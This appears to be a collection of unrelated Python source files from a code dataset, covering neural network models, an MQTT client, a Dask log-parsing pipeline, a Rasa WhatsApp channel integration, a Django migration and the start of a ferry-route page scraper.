n_sig, n_bkg, sweights = fit_result
import copy
sweights = copy.deepcopy(sweights)
plt.figure("new figure")
# plt.hist(range(100))
# plt.figure("new figure")
plt.hist(sweights, bins=30)
data_copy.set_weights(sweights)
data_copy.plot()
elif mode == "ks":
pass
input("Finished, press 'Enter' to close ROOT plots.")
plt.show()
input("Finished, press 'Enter' to close plots.")
| StarcoderdataPython |
5029946 | <reponame>calmisential/TensorFlow2.0-MNIST
import tensorflow as tf
from config import *
def VGG16():
model = tf.keras.Sequential()
# 1
model.add(tf.keras.layers.Conv2D(filters=64,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu,
input_shape=(image_height, image_width, channels)))
model.add(tf.keras.layers.Conv2D(filters=64,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.MaxPool2D(pool_size=(2, 2),
strides=2,
padding='same'))
# 2
model.add(tf.keras.layers.Conv2D(filters=128,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Conv2D(filters=128,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.MaxPool2D(pool_size=(2, 2),
strides=2,
padding='same'))
# 3
model.add(tf.keras.layers.Conv2D(filters=256,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Conv2D(filters=256,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Conv2D(filters=256,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.MaxPool2D(pool_size=(2, 2),
strides=2,
padding='same'))
# 4
model.add(tf.keras.layers.Conv2D(filters=512,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Conv2D(filters=512,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Conv2D(filters=512,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.MaxPool2D(pool_size=(2, 2),
strides=2,
padding='same'))
# 5
model.add(tf.keras.layers.Conv2D(filters=512,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Conv2D(filters=512,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Conv2D(filters=512,
kernel_size=(3, 3),
strides=1,
padding='same',
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.MaxPool2D(pool_size=(2, 2),
strides=2,
padding='same'))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(units=4096,
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Dense(units=4096,
activation=tf.keras.activations.relu))
model.add(tf.keras.layers.Dense(units=NUM_CLASSES,
activation=tf.keras.activations.softmax))
return model | StarcoderdataPython |
3319469 | # declarando minhas listas e variáveis
x=[0,0,0,0] #coluna x
y=[0,0,0,0] #coluna y
xy=[0,0,0,0] #coluna xy
x2=[0,0,0,0] #coluna x²
a=0 #utilizo para contador neste primeiro momento
b=0
while(a<3): #loop para receber os valores de x e y
x[a]=float(input("Digite um valora para x... ")) #recebe um valor de x e armazena na lista da coluna x
y[a]=float(input("Digite um valora para Y... ")) #recebe um valor de y e armazena na lista da coluna y
xy[a]=x[a]*y[a] #faz a multiplicação do xy
x2[a]=x[a]*x[a] #eleva o x ao quadrado e guarda em x2
a+=1 #pula para a próxima linha até dar 3 linhas na "tabela"
#preenchendo a última linha
x[3]=x[0]+x[1]+x[2]
y[3]=y[0]+y[1]+y[2]
xy[3]=xy[0]+xy[1]+xy[2]
x2[3]=x2[0]+x2[1]+x2[2]
a=(3*xy[3]-x[3]*y[3])/(3*x2[3]-(x[3]**2)) #reseto a e acho seu valor
b=(y[3]/3)-((a*x[3])/3)
print(f"y={a}x+{b}") | StarcoderdataPython |
6476802 | from circus.commands.base import Command
from circus.exc import ArgumentError, MessageError
from circus.util import convert_opt
class Get(Command):
"""\
Get the value of specific watcher options
=========================================
This command can be used to query the current value of one or
more watcher options.
ZMQ Message
-----------
::
{
"command": "get",
"properties": {
"keys": ["key1, "key2"]
"name": "nameofwatcher"
}
}
A request message contains two properties:
- keys: list, The option keys for which you want to get the values
- name: name of watcher
The response object has a property ``options`` which is a
dictionary of option names and values.
eg::
{
"status": "ok",
"options": {
"graceful_timeout": 300,
"send_hup": True,
},
time': 1332202594.754644
}
Command line
------------
::
$ circusctl get <name> <key1> <key2>
"""
name = "get"
properties = ['name', 'keys']
def message(self, *args, **opts):
if len(args) < 2:
raise ArgumentError("Invalid number of arguments")
return self.make_message(name=args[0], keys=args[1:])
def execute(self, arbiter, props):
watcher = self._get_watcher(arbiter, props.get('name'))
# get options values. It return an error if one of the asked
# options isn't found
options = {}
for name in props.get('keys', []):
if name in watcher.optnames:
options[name] = getattr(watcher, name)
else:
raise MessageError("%r option not found" % name)
return {"options": options}
def console_msg(self, msg):
if msg['status'] == "ok":
ret = []
for k, v in msg.get('options', {}).items():
ret.append("%s: %s" % (k, convert_opt(k, v)))
return "\n".join(ret)
return self.console_error(msg)
| StarcoderdataPython |
8058813 | <filename>frimcla/command_line.py
from __future__ import absolute_import
from . import fullAnalysis
import argparse
import sys
def main():
arg1 = sys.argv[1]
fullAnalysis.fullAnalysis(arg1) | StarcoderdataPython |
5024420 | <reponame>taufikxu/RepLibrary<gh_stars>0
import time
import torch
import torch.nn as nn
from Tools import FLAGS
from library.data_iters import dataset_info, get_data_augmentation
def l2_norm(inputx):
assert len(inputx.shape) == 2
norm = torch.sqrt(torch.sum(inputx ** 2, 1)).view(-1, 1)
return inputx / norm
def identity(x):
return x
class mlpModule(nn.Module):
def __init__(self, input_dim, hidden_dim, output_dim, norm_layer):
super().__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim)
self.bn = norm_layer(hidden_dim)
self.fc2 = nn.Linear(hidden_dim, output_dim, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
out = self.fc1(x)
out = self.bn(out)
out = self.relu(out)
out = self.fc2(out)
return out
class ByolWrapper(nn.Module):
def __init__(self, backbone, projector, predictor, classifier, normalize="l2_norm"):
super().__init__()
self.backbone = backbone
self.projector = projector
self.predictor = predictor
self.classifier = classifier
self.normalize = eval(normalize)
def forward(self, x, y=None):
embedding = self.backbone(x)
proj_out = self.projector(embedding)
if y is not None:
return embedding, self.normalize(proj_out)
pred_out = self.predictor(proj_out)
logit_cla = self.classifier(embedding.detach())
return self.normalize(proj_out), self.normalize(pred_out), logit_cla
def forward_cla(self, x):
return self.classifier(x)
class EbmWrapper(nn.Module):
def __init__(self, backbone, classifier):
super().__init__()
self.backbone = backbone
self.classifier = classifier
def forward(self, x):
energy, embedding = self.backbone(x, "1dim")
logit_cla = self.classifier(embedding.detach())
return energy, embedding, logit_cla
def forward_cla(self, x):
return self.classifier(x)
| StarcoderdataPython |
9628949 | ################################################################################
# MIT License
#
# Copyright (c) 2017 <NAME> & <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
################################################################################
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.application.internet import ClientService, backoffPolicy
from twisted.internet.endpoints import clientFromString
from twisted.internet.protocol import Factory
from protocol import MQTTProtocol
from definitions import *
class MQTTWorker(ClientService):
def __init__(self, reactor, config):
self.endpoint = clientFromString(reactor, config["endpoint"])
self.factory = Factory.forProtocol(MQTTProtocol)
self.version = VERSION[config["version"]]
self.clientId = config["client_id"]
self.username = config["username"]
self.appKey = config["app_key"]
self.protocol = None
# In flight subscribe request
self.subscribe_requests = {}
# Map topic and related function
self.topics = {}
# Map of publish waiting for ack
self.publish_requests = {}
ClientService.__init__(self, self.endpoint, self.factory, retryPolicy=backoffPolicy())
def start(self):
print("INFO: Starting MQTT Client")
self.whenConnected().addCallback(self.connected)
self.startService()
def connected(self, protocol):
print("INFO: Client Connected")
self.protocol = protocol
protocol.connect(self)
def joined(self):
print("INFO: MQTT joined")
@inlineCallbacks
def subscribe(self, topic, function, qos=0):
yield self.protocol.subscribe(topic, function, qos)
@inlineCallbacks
def publish(self, topic, message, qos=0):
yield self.protocol.publish(topic, message, qos)
def addSubscribeRequest(self, request, d):
# XXX To Do: Add boolean to know if a timer should be start
if not request._id in self.subscribe_requests:
self.subscribe_requests[request._id] = d
def getSubscribeRequest(self, _id, remove=False):
res = None
if _id in self.subscribe_requests:
res = self.subscribe_requests[_id]
if remove:
del self.subscribe_requests[_id]
return res
def addTopic(self, topic, function):
if not topic in self.topics:
self.topics[topic] = function
def getTopic(self, topic):
res = None
if topic in self.topics:
res = self.topics[topic]
return res
def addPublishRequest(self, request, d):
# XXX To Do: Add boolean to know if a timer should be start
if not request._id in self.publish_requests:
self.publish_requests[request._id] = d
def getPublishRequest(self, _id, remove=False):
res = None
if _id in self.publish_requests:
res = self.publish_requests[_id]
if remove:
del self.publish_requests[_id]
return res
| StarcoderdataPython |
9735469 | import time
import argparse
import json
import os
import glob
import sys
import re
import random
import string
# parse the arguments
parser = argparse.ArgumentParser(description="Apache data cleaning + join")
parser.add_argument(
"--path",
type=str,
dest="data_path",
default="../../test/resources/2000.01.01.txt",
help="path or pattern to log data",
)
parser.add_argument(
"--ip_blacklist_path",
type=str,
dest="ip_blacklist_path",
default="../../test/resources/bad_ips_all.txt",
help="path or pattern to the ip blacklist",
)
parser.add_argument(
"--pipeline_type",
type=str,
dest="pipeline_type",
choices=["regex", "strip", "split_regex", "split"],
default="regex",
help="whether to use the regex clean function or the string strip based one",
)
parser.add_argument(
"--output-path",
type=str,
dest="output_path",
default="dask_output/",
help='specify path where to save output data files',
)
args = parser.parse_args()
# define the parsing functions
def ParseWithRegex(logline):
""" Parse a line in the Apache Common Log format
Args:
logline (str): a line of text in the Apache Common Log format
Returns:
tuple: either a dictionary containing the parts of the Apache Access Log and 1,
or the original invalid log line and 0
"""
try:
match = re.search(
'^(\S+) (\S+) (\S+) \[([\w:/]+\s[+\-]\d{4})\] "(\S+) (\S+)\s*(\S*)\s*" (\d{3}) (\S+)',
logline,
)
if match is None:
return ("", "", "", "", "", "", "", -1, -1)
size_field = match.group(9)
if size_field == "-":
size = 0
else:
size = int(match.group(9))
return (
match.group(1),
match.group(2),
match.group(3),
match.group(4),
match.group(5),
match.group(6),
match.group(7),
int(match.group(8)),
size,
)
except:
return ("", "", "", "", "", "", "", -1, -1)
def extract_ip(x):
match = re.search("(^\S+) ", x)
if match:
return match[1]
else:
return ''
def extract_client_id(x):
match = re.search("^\S+ (\S+) ", x)
if match:
return match[1]
else:
return ''
def extract_user_id(x):
match = re.search("^\S+ \S+ (\S+) ", x)
if match:
return match[1]
else:
return ''
def extract_date(x):
match = re.search("^.*\[([\w:/]+\s[+\-]\d{4})\]", x)
if match:
return match[1]
else:
return ''
def extract_method(x):
match = re.search('^.*"(\S+) \S+\s*\S*\s*"', x)
if match:
return match[1]
else:
return ''
def extract_endpoint(x):
match = re.search('^.*"\S+ (\S+)\s*\S*\s*"', x)
if match:
return match[1]
else:
return ''
def extract_protocol(x):
match = re.search('^.*"\S+ \S+\s*(\S*)\s*"', x)
if match:
return match[1]
else:
return ''
def extract_response_code(x):
match = re.search('^.*" (\d{3}) ', x)
if match:
return int(match[1])
else:
return -1
def extract_content_size(x):
match = re.search('^.*" \d{3} (\S+)', x)
if match:
return 0 if match[1] == '-' else int(match[1])
else:
return -1
def ParseWithStrip(x):
try:
y = x.strip()
i = y.find(" ")
ip = y[:i]
y = y[i + 1 :]
i = y.find(" ")
client_id = y[:i]
y = y[i + 1 :]
i = y.find(" ")
user_id = y[:i]
y = y[i + 1 :]
i = y.find("]")
date = y[:i][1:]
y = y[i + 2 :]
y = y[y.find('"') + 1 :]
method = ""
endpoint = ""
protocol = ""
failed = False
if y.find(" ") < y.rfind('"'):
i = y.find(" ")
method = y[:i]
y = y[i + 1 :]
i = y.find(" ") # needs to be any whitespace
endpoint = y[:i]
y = y[i + 1 :]
i = y.rfind('"')
protocol = y[:i]
protocol = protocol[protocol.rfind(" ") + 1 :]
y = y[i + 2 :]
else:
failed = True
i = y.rfind('"')
y = y[i + 2 :]
i = y.find(" ")
response_code = y[:i]
content_size = y[i + 1 :]
if not failed:
return (
ip,
client_id,
user_id,
date,
method,
endpoint,
protocol,
int(response_code),
0 if content_size == "-" else int(content_size),
)
else:
return ("", "", "", "", "", "", "", -1, -1)
except:
return ("", "", "", "", "", "", "", -2, -2)
def RandomizeEndpointUDF(x):
return re.sub(
"^/~[^/]+",
"/~" + "".join([random.choice(string.ascii_uppercase) for _ in range(10)]),
x,
)
def try_int(x):
try:
return int(x)
except:
return -1
# save the run configuration
output_path = args.output_path
clean_function = ParseWithRegex if args.pipeline_type == "regex" else ParseWithStrip
# get the input files
perf_paths = [args.data_path]
if not os.path.isfile(args.data_path):
# inner join in dask is broken, run therefore without 4G of data
file_paths = sorted(list(filter(lambda p: not '2011.12.08' in p and not '2011.12.09' in p, glob.glob(os.path.join(args.data_path, "*.*.*.txt")))))
perf_paths = file_paths
if not perf_paths:
print("found no log data to process, abort.")
sys.exit(1)
if __name__ == "__main__":
# import dask
startup_time = 0
tstart = time.time()
import dask
import dask.dataframe as dd
import dask.bag as db
from dask.diagnostics import ProgressBar
from dask.distributed import Client
import dask.multiprocessing
import os
import glob
import sys
import pandas as pd
import numpy as np
client = Client(n_workers=16, threads_per_worker=1, processes=True, memory_limit='8GB')
print(client)
startup_time = time.time() - tstart
print("Dask startup time: {}".format(startup_time))
# define regex function
# open file
print("*Dask Start Time: {}".format(time.time()))
# parse the rows
if args.pipeline_type == 'split_regex':
tstart = time.time()
b = db.read_text(perf_paths, linedelimiter="\n")
df = b.to_dataframe()
df["ip"] = df[0].apply(extract_ip, meta=str)
df["client_id"] = df[0].apply(extract_client_id, meta=str)
df["user_id"] = df[0].apply(extract_user_id, meta=str)
df["date"] = df[0].apply(extract_date, meta=str)
df["method"] = df[0].apply(extract_method, meta=str)
df["endpoint"] = df[0].apply(extract_endpoint, meta=str)
df["protocol"] = df[0].apply(extract_protocol, meta=str)
df["response_code"] = df[0].apply(extract_response_code, meta=int)
df["content_size"] = df[0].apply(extract_content_size, meta=int)
df = df[df.endpoint.str.len() > 0]
df["endpoint"] = df['endpoint'].apply(RandomizeEndpointUDF, meta=str)
elif args.pipeline_type == 'split':
tstart = time.time()
b = db.read_text(perf_paths, linedelimiter="\n")
df = b.to_dataframe()
df["cols"] = df[0].apply(lambda x: x.split(' '), meta=object)
df["ip"] = df['cols'].apply(lambda x: x[0].strip() if len(x) > 0 else '', meta=str)
df["client_id"] = df['cols'].apply(lambda x: x[1].strip() if len(x) > 1 else '', meta=str)
df["user_id"] = df['cols'].apply(lambda x: x[2].strip() if len(x) > 2 else '', meta=str)
df["date"] = df['cols'].apply(lambda x: x[3] + " " + x[4] if len(x) > 4 else '', meta=str)
df["date"] = df['date'].apply(lambda x: x.strip(), meta=str)
df["date"] = df['date'].apply(lambda x: x[1:-1], meta=str)
df["method"] = df['cols'].apply(lambda x: x[5].strip() if len(x) > 5 else '', meta=str)
df["method"] = df['method'].apply(lambda x: x[1:], meta=str)
df["endpoint"] = df['cols'].apply(lambda x: x[6].strip() if len(x) > 6 else '', meta=str)
df["protocol"] = df['cols'].apply(lambda x: x[7].strip() if len(x) > 7 else '', meta=str)
df["protocol"] = df['protocol'].apply(lambda x: x[:-1], meta=str)
df["response_code"] = df['cols'].apply(lambda x: try_int(x[8].strip()) if len(x) > 8 else -1, meta=int)
df["content_size"] = df['cols'].apply(lambda x: x[9].strip() if len(x) > 9 else '', meta=str)
df["content_size"] = df['content_size'].apply(lambda x: 0 if x == '-' else try_int(x), meta=int)
df = df[df.endpoint.str.len() > 0]
df["endpoint"] = df['endpoint'].apply(RandomizeEndpointUDF, meta=str)
else:
tstart = time.time()
b = db.read_text(perf_paths, linedelimiter="\n")
df = b.to_dataframe()
df["new"] = df[0].apply(clean_function, meta=(0, "object"))
df["ip"] = df["new"].apply(lambda x: x[0], meta=str)
df["client_id"] = df["new"].apply(lambda x: x[1], meta=str)
df["user_id"] = df["new"].apply(lambda x: x[2], meta=str)
df["date"] = df["new"].apply(lambda x: x[3], meta=str)
df["method"] = df["new"].apply(lambda x: x[4], meta=str)
df["endpoint"] = (
df["new"].apply(lambda x: x[5], meta=str).apply(RandomizeEndpointUDF, meta=str)
)
df["protocol"] = df["new"].apply(lambda x: x[6], meta=str)
df["response_code"] = df["new"].apply(lambda x: x[7], meta=int)
df["content_size"] = df["new"].apply(lambda x: x[8], meta=int)
# join on bad ips
bad_ip_df = dd.read_csv([args.ip_blacklist_path], low_memory=False).repartition(npartitions=1)
df_malicious_requests = dd.merge(
df, bad_ip_df, left_on="ip", right_on="BadIPs", how="inner"
)
df_malicious_requests = df_malicious_requests[
[
"ip",
"date",
"method",
"endpoint",
"protocol",
"response_code",
"content_size",
]
]
df_malicious_requests.to_csv(output_path, index=None)
job_time = time.time() - tstart
print("Dask job time: {} s".format(job_time))
print(json.dumps({"startupTime": startup_time, "jobTime": job_time}))
| StarcoderdataPython |
8000657 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-13 17:46
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('premises', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Argument',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pub_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date published')),
('staged', models.DateTimeField(blank=True, null=True)),
('aim', models.IntegerField(choices=[(1, 'To support the positive version of the conclusion.'), (2, 'To support the negative version of the conclusion.'), (3, 'To point why a decision on the matter is required soon.'), (4, 'To point out missing knowledge on the matter.')], default=1)),
('conclusion', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='conclusion', to='premises.Premise')),
('premise1', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='premise1', to='premises.Premise')),
('premise2', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='premise2', to='premises.Premise')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
'get_latest_by': 'pub_date',
},
),
migrations.CreateModel(
name='ArgumentVote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pub_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date published')),
('last_voted', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last voted')),
('value', models.IntegerField(choices=[(1, 'completely invalid'), (2, 'weak'), (3, 'strong'), (4, 'completely valid')], default=1)),
('object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='arguments.Argument')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| StarcoderdataPython |
5153151 | <gh_stars>1-10
import base64
import hmac
import json
import logging
import os
from asyncio import wait
from datetime import datetime, timedelta
from typing import Any, Awaitable, Callable, Dict, List, Optional, Text
from urllib.parse import urljoin
import asyncpg
import httpx
import sentry_sdk
from async_lru import alru_cache
from rasa.cli import utils as cli_utils
from rasa.core.channels import InputChannel, OutputChannel, UserMessage
from rasa.core.events import UserUttered
from sanic import Blueprint, response
from sanic.request import Request
from sanic.response import HTTPResponse
from sentry_sdk.integrations.logging import LoggingIntegration
from sentry_sdk.integrations.sanic import SanicIntegration
logger = logging.getLogger(__name__)
turn_client = httpx.Client()
SENTRY_DSN = os.environ.get("SENTRY_DSN", None)
if SENTRY_DSN:
sentry_sdk.init(
dsn=SENTRY_DSN, integrations=[LoggingIntegration(), SanicIntegration()]
)
@alru_cache(maxsize=None)
async def get_media_id(turn_url: Text, turn_token: Text, url: Text, http_retries: int):
# TODO: Respect the caching headers from the URL, rather than indefinitely caching
for i in range(http_retries):
try:
async with turn_client.stream("GET", url) as media_response:
media_response.raise_for_status()
turn_response = await turn_client.post(
urljoin(turn_url, "v1/media"),
headers={
"Authorization": f"Bearer {turn_token}",
"Content-Type": media_response.headers["Content-Type"],
},
data=media_response.aiter_bytes(),
)
turn_response.raise_for_status()
response_data: Any = turn_response.json()
return response_data["media"][0]["id"]
except httpx.HTTPError as e:
if i == http_retries - 1:
raise e
class TurnOutput(OutputChannel):
"""
Turn output channel
"""
@classmethod
def name(cls) -> Text:
return "turn"
def __init__(
self,
url: Text,
token: Text,
http_retries: int = 3,
conversation_claim: Optional[Text] = None,
inbound_message_id: Optional[Text] = None,
):
self.url = url
self.token = token
self.conversation_claim = conversation_claim
self.http_retries = http_retries
self.inbound_message_id = inbound_message_id
super().__init__()
async def _send_message(
self, body: Optional[dict], claim: Optional[Text] = "extend", **kwargs
) -> None:
headers = {"Authorization": f"Bearer {self.token}"}
if self.conversation_claim:
if claim == "extend":
headers["X-Turn-Claim-Extend"] = self.conversation_claim
elif claim == "release" or claim == "revert":
headers["X-Turn-Claim-Release"] = self.conversation_claim
urlpath = "v1/messages"
if self.conversation_claim and self.inbound_message_id and claim == "revert":
urlpath = f"v1/messages/{self.inbound_message_id}/automation"
headers["Accept"] = "application/vnd.v1+json"
body = None
for i in range(self.http_retries):
if not body:
headers["Content-Length"] = "0"
try:
result = await turn_client.post(
urljoin(self.url, urlpath), headers=headers, json=body,
)
result.raise_for_status()
return
except httpx.HTTPError as e:
if i == self.http_retries - 1:
raise e
async def send_response(self, recipient_id: Text, message: Dict[Text, Any]) -> None:
# The Rasa implementation for this sends the text and the media part of the
# message separately. For WhatsApp, we want to send this as a media message
# with a text caption, so we handle it differently here
if message.get("image"):
await self.send_image_url(recipient_id, message.pop("image"), **message)
elif message.get("document"):
await self.send_document_url(
recipient_id, message.pop("document"), **message
)
elif message.get("custom"):
await self.send_custom_json(recipient_id, message.pop("custom"), **message)
elif message.get("buttons"):
await self.send_text_with_buttons(
recipient_id, message.pop("text"), message.pop("buttons"), **message
)
elif message.get("text"):
await self.send_text_message(recipient_id, message.pop("text"), **message)
else:
raise NotImplementedError()
async def send_text_message(
self, recipient_id: Text, text: Text, **kwargs: Any
) -> None:
await self._send_message(
{"to": recipient_id, "type": "text", "text": {"body": text}}, **kwargs
)
async def send_image_url(
self, recipient_id: Text, image: Text, text: Text = "", **kwargs: Any
) -> None:
media_id = await get_media_id(self.url, self.token, image, self.http_retries)
image_obj = {"id": media_id}
if text:
image_obj["caption"] = text
await self._send_message(
{"to": recipient_id, "type": "image", "image": image_obj}, **kwargs
)
async def send_document_url(
self, recipient_id: Text, document: Text, text: Text = "", **kwargs: Any
) -> None:
media_id = await get_media_id(self.url, self.token, document, self.http_retries)
document_obj = {"id": media_id}
if text:
document_obj["caption"] = text
await self._send_message(
{"to": recipient_id, "type": "document", "document": document_obj}, **kwargs
)
async def send_text_with_buttons(
self,
recipient_id: Text,
text: Text,
buttons: List[Dict[Text, Any]],
**kwargs: Any,
) -> None:
for idx, button in enumerate(buttons):
text += "\n"
text += cli_utils.button_to_string(button, idx)
await self.send_text_message(recipient_id, text, **kwargs)
async def send_custom_json(
self, recipient_id: Text, json_message: Dict[Text, Any], **kwargs: Any
) -> None:
json_message["to"] = recipient_id
await self._send_message(json_message, **kwargs)
# TODO: elements message type
# TODO: attachment message type
class TurnInput(InputChannel):
"""
Turn input channel
"""
@classmethod
def name(cls) -> Text:
return "turn"
@classmethod
def from_credentials(cls, credentials: Dict[Text, Any]) -> InputChannel:
if not credentials:
cls.raise_missing_credentials_exception()
return cls(
credentials.get("hmac_secret"),
credentials["url"],
credentials["token"],
credentials.get("postgresql_url"),
credentials.get("http_retries", 3),
)
def __init__(
self,
hmac_secret: Optional[Text],
url: Text,
token: Text,
postgresql_url: Optional[Text],
http_retries: int,
) -> None:
self.hmac_secret = hmac_secret
self.url = url
self.token = token
self.postgresql_url = postgresql_url
self._postgresql_pool = None
self.http_retries = http_retries
async def get_postgresql_pool(self) -> Optional[asyncpg.pool.Pool]:
if self._postgresql_pool is None and self.postgresql_url is not None:
self._postgresql_pool = await asyncpg.create_pool(self.postgresql_url)
return self._postgresql_pool
async def message_processed(
self, sender_id: Optional[Text], message_id: Optional[Text]
) -> bool:
"""
Have we processed a message with this ID before
"""
if not sender_id or not message_id:
return False
pool = await self.get_postgresql_pool()
if pool is None:
# If we don't have a postgresql config, don't deduplicate
return False
async with pool.acquire() as connection:
async with connection.transaction():
result = await connection.fetchval(
"""
SELECT 1
FROM events
WHERE
sender_id = $1 AND
type_name = $2 AND
data::json ->> 'message_id' = $3 AND
timestamp > $4
LIMIT 1
""",
sender_id,
UserUttered.type_name,
message_id,
(datetime.utcnow() - timedelta(days=1)).timestamp(),
)
return result == 1
def blueprint(
self, on_new_message: Callable[[UserMessage], Awaitable[Any]]
) -> Blueprint:
turn_webhook = Blueprint("turn_webhook", __name__)
@turn_webhook.route("/", methods=["GET"])
async def health(request: Request) -> HTTPResponse:
return response.json({"status": "ok"})
@turn_webhook.route("/webhook", methods=["POST"])
async def webhook(request: Request) -> HTTPResponse:
if self.hmac_secret:
signature = request.headers.get("X-Turn-Hook-Signature") or ""
valid_signature = self.validate_signature(
self.hmac_secret, request.body, signature
)
if not valid_signature:
return response.json(
{"success": False, "error": "invalid_signature"}, status=401
)
else:
logging.warning("hmac_secret config not set, not validating signature")
try:
messages = request.json.get("messages", [])
assert isinstance(messages, list)
except (TypeError, AttributeError, AssertionError):
return response.json(
{"success": False, "error": "invalid_body"}, status=400
)
conversation_claim = request.headers.get("X-Turn-Claim", None)
user_messages = []
for message in messages:
try:
message["conversation_claim"] = conversation_claim
processed = await self.message_processed(
message.get("from"), message.get("id")
)
if not processed:
user_messages.append(self.extract_message(message))
except (TypeError, KeyError, AttributeError):
logger.warning(f"Invalid message: {json.dumps(message)}")
return response.json(
{"success": False, "error": "invalid_message"}, status=400
)
if user_messages:
# wait doesn't like empty lists
await wait(list(map(on_new_message, user_messages)))
return response.json({"success": True})
return turn_webhook
@staticmethod
def validate_signature(secret: Text, payload: bytes, signature: Text) -> bool:
decoded_secret = secret.encode("utf8")
decoded_signature = base64.b64decode(signature)
digest = hmac.new(decoded_secret, payload, "sha256").digest()
return hmac.compare_digest(digest, decoded_signature)
def extract_message(self, message: dict) -> UserMessage:
message_type = message["type"]
handler = getattr(self, f"handle_{message_type}")
return handler(message)
def handle_common(self, text: Text, message: dict) -> UserMessage:
return UserMessage(
text=text,
output_channel=self.get_output_channel(
message.pop("conversation_claim", None), message.get("id")
),
sender_id=message.pop("from"),
input_channel=self.name(),
message_id=message.pop("id"),
metadata=message,
)
def handle_text(self, message: dict) -> UserMessage:
return self.handle_common(message.pop("text")["body"], message)
def handle_media(self, media_type: str, message: dict) -> UserMessage:
return self.handle_common(message[media_type].pop("caption", ""), message)
def handle_audio(self, message: dict) -> UserMessage:
return self.handle_media("audio", message)
def handle_document(self, message: dict) -> UserMessage:
return self.handle_media("document", message)
def handle_image(self, message: dict) -> UserMessage:
return self.handle_media("image", message)
def handle_video(self, message: dict) -> UserMessage:
return self.handle_media("video", message)
def handle_voice(self, message: dict) -> UserMessage:
return self.handle_media("voice", message)
def handle_contacts(self, message: dict) -> UserMessage:
return self.handle_common("", message)
def handle_location(self, message: dict) -> UserMessage:
return self.handle_common("", message)
def get_output_channel(
self,
conversation_claim: Optional[Text] = None,
inbound_message_id: Optional[Text] = None,
) -> OutputChannel:
return TurnOutput(
self.url,
self.token,
self.http_retries,
conversation_claim,
inbound_message_id,
)
| StarcoderdataPython |
3249906 | #!/usr/bin/python3
import threading
from datetime import datetime
import urllib.request
BASE_PATH = '/Users/sukumargv/bc_ferries/'
def get_page(page_url, local_fname):
d = datetime.now()
fname = d.strftime("{}/{}".format(BASE_PATH, local_fname))
urllib.request.urlretrieve(page_url, fname)
"""
http://orca.bcferries.com:8080/cc/settings/includes/maps/route0.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route1.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route2.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route3.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route4.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route5.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route6.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route7.html
http://bcferries.applocation.net/routemaps/route13.html
http://bcferries.applocation.net/routemaps/route16.html
http://bcferries.applocation.net/routemaps/route17.html
